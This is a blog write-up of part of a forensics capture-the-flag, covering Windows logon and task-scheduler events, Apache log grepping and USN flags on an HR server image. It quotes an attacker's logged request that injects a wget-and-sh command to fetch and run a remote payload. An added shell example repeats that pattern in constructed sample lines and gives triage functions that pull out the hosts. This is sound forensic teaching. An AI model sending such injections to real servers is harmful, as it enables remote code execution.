DEF CON DFIR CTF 2018 Write-up Part 2 - HR Server Advanced and Expert Challenges


A writeup for the 2018 DEF CON DFIR CTF - Part 2

Introduction

Following on from my last blog, I turned to the Advanced and Expert level challenges to try and uncover undoubtedly nefarious deeds. Let’s go!

HR Server - Advanced Challenges

Logon Event

The first question asks you to name the user that logged on at a specific time (given in UTC), as well as the logon type, logon process and IP address. With all our data ingested and ready for searching in Kibana, this was reasonably straightforward. I narrowed the time range down to a couple of seconds around the required timestamp and discovered the following logon event (4624):

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}"/>
    <EventID>4624</EventID>
    <Version>2</Version>
    ...
    <TimeCreated SystemTime="2018-07-30T22:31:33.868384100Z"/>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-18</Data>
    <Data Name="SubjectUserName">WIN-29U41M70JCO$</Data>
    <Data Name="SubjectDomainName">WORKGROUP</Data>
    <Data Name="SubjectLogonId">0x00000000000003e7</Data>
    <Data Name="TargetUserSid">S-1-5-21-2967420476-1305424719-3994513216-1000</Data>
    <Data Name="TargetUserName">mpowers</Data>
    <Data Name="TargetDomainName">WIN-29U41M70JCO</Data>
    <Data Name="TargetLogonId">0x0000000024ba28b7</Data>
    <Data Name="LogonType">10</Data>
    <Data Name="LogonProcessName">User32 </Data>
    ...
    <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
    <Data Name="IpAddress">74.118.138.195</Data>
    ...
  </EventData>
</Event>

All the data we need for the answer is here: mpowers - 10 - User32 - 74.118.138.195. LogonType 10 indicates a remote interactive logon… it’s probably fine?

Incidentally, this information came from a shadow copy of the security event log. As pointed out in InfoSecurityGeek’s walkthrough, the security event log was wiped several days later (event ID 1102). Nefarious deeds indeed.

Task Started

Next up: what is the name of the task that was started at blah blah particular UTC timestamp? It’s a great question really, and I have no idea. That is, I had no idea until I looked it up in Kibana:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-TaskScheduler" Guid="{DE7B24EA-73C8-4A09-985D-5BDADCFA9017}"/>
    <EventID>100</EventID>
    <Version>0</Version>
    <Level>4</Level>
    <Task>100</Task>
    <Opcode>1</Opcode>
    <Keywords>0x8000000000000001</Keywords>
    <TimeCreated SystemTime="2018-07-27T02:42:43.948604500Z"/>
    <EventRecordID>2383</EventRecordID>
    <Correlation ActivityID="{937BB509-B699-4441-B2FE-BB167784D470}"/>
    <Execution ProcessID="828" ThreadID="7568"/>
    <Channel>Microsoft-Windows-TaskScheduler/Operational</Channel>
    <Computer>WIN-29U41M70JCO</Computer>
    <Security UserID="S-1-5-18"/>
  </System>
  <EventData Name="TaskStartEvent">
    <Data Name="TaskName">\Throw Taco</Data>
    <Data Name="UserContext">WIN-29U41M70JCO\mpowers</Data>
    <Data Name="InstanceId">{937BB509-B699-4441-B2FE-BB167784D470}</Data>
  </EventData>
</Event>

As much as I love good tacos, \Throw Taco doesn’t sound like a very legit task IMO. We’d better keep investigating.

Web App

A couple more questions are up next re. the OrangeHRM portal. The first one asks which IP address was accessing the web portal with the user agent “Chrome 68.0.3440.84”. Some grepping of the access logs will suffice here:

# grep -a 68.0.3440 /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | cut -d ' ' -f1 | sort -u
74.118.139.108

Next, we need to know which version of Apache was being used, which you can find in the changelog (C:\Program Files\OrangeHRM\4.1\apache\CHANGES.txt) - the answer is 2.4.26 (the CTF just requires the answer 2.4).

USN Flags

To round out the Advanced challenges, we need to give the integer representation for a reason code consisting of three particular flags ORed together. I solved this by just searching my dataset for records that contained the relevant flags (having been parsed out of the USN Journal) and then just read off the value:

Alternatively, you could look up the flag values and calculate the answer that way: 0x80000000 | 0x2 | 0x100 = 0x80000102 = 2147483906.

HR Server - Expert Challenges

Web Traffic

There are only two questions in the expert category, and to be honest they’re a bit of a doddle. The first question asks you for the top communicating IP address with the web server:

# cut -d ' ' -f1 /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | uniq -c | sort -n | tail -n 1
    233 74.118.138.195

Hmmm… it’s the same IP that we saw doing remote logons as the mpowers user.

Finally, we’re asked for the number of requests that were made to the web server that contain a wget command:

# grep -a wget /mnt/windows_mount/Program\ Files/OrangeHRM/4.1/apache/logs/access.log | wc -l
101

Pretty sketchy stuff there - looks like some kind of attempted RCE shenanigans, as per the following sample log that includes an attempt to run wget:

92.3.30.123 - - [23/Jul/2018:12:26:27 -0700] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 404 1053 "-" "Hello, World"
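
The two access-log questions above, as an added example that is not part of the original write-up: the same triage written as shell functions over constructed sample lines (documentation-range IPs, hypothetical function names, Apache combined log format assumed). Because `uniq -c` only merges adjacent lines, the client column is sorted before counting, and each request is URL-decoded before matching so the injected command reads as plain text.

```shell
#!/bin/sh
# Added example: constructed log lines, documentation-range IPs.
sample_log() {
cat <<'EOF'
198.51.100.7 - - [23/Jul/2018:12:00:01 -0700] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Jul/2018:12:00:02 -0700] "GET /login.cgi?cli=aa%27;wget%20http://192.0.2.50/r%20-O%20/tmp/r HTTP/1.1" 404 1053 "-" "Hello, World"
198.51.100.7 - - [23/Jul/2018:12:00:03 -0700] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Jul/2018:12:00:04 -0700] "GET /login.cgi?cli=aa%27;wget%20-q%20http://192.0.2.50/r%0a HTTP/1.1" 404 1053 "-" "Hello, World"
198.51.100.7 - - [23/Jul/2018:12:00:05 -0700] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

# Per-client request totals, busiest first. uniq -c only merges adjacent
# duplicates and access logs interleave clients, so sort first.
top_talkers() {
    awk '{print $1}' | sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Print "client<TAB>decoded request" for every request whose URL-decoded
# form mentions wget (case-insensitive).
wget_requests() {
    awk -F'"' '
    function hexval(c) { return index("0123456789abcdef", tolower(c)) - 1 }
    function urldecode(s,    out, i, c, v) {
        out = ""
        for (i = 1; i <= length(s); i++) {
            c = substr(s, i, 1)
            if (c == "%" && substr(s, i + 1, 2) ~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) {
                v = hexval(substr(s, i + 1, 1)) * 16 + hexval(substr(s, i + 2, 1))
                # Decode printable ASCII only: control bytes stay escaped so
                # a request cannot add lines to the analyst output.
                if (v >= 32 && v < 127) { c = sprintf("%c", v); i += 2 }
            }
            out = out c
        }
        return out
    }
    { req = urldecode($2)
      if (tolower(req) ~ /wget/) { split($1, f, " "); print f[1] "\t" req } }'
}

# Hosts the wget requests tried to download from, with hit counts.
wget_hosts() {
    wget_requests | sed -n 's|.*[Ww][Gg][Ee][Tt][^:]*https\{0,1\}://\([^/ ]*\).*|\1|p' |
        sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

sample_log | top_talkers; sample_log | wget_hosts
```

On a real log, feed the file on stdin, for example `top_talkers < access.log`.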

And that’s it… we’re rewarded for finishing all of the HR Server questions with the password to the next image (tacotunities). On top of that, we’re awarded five bonus points. Hurrah! Tune in soon for the next part of the write-up, which will be linked below when it’s ready.
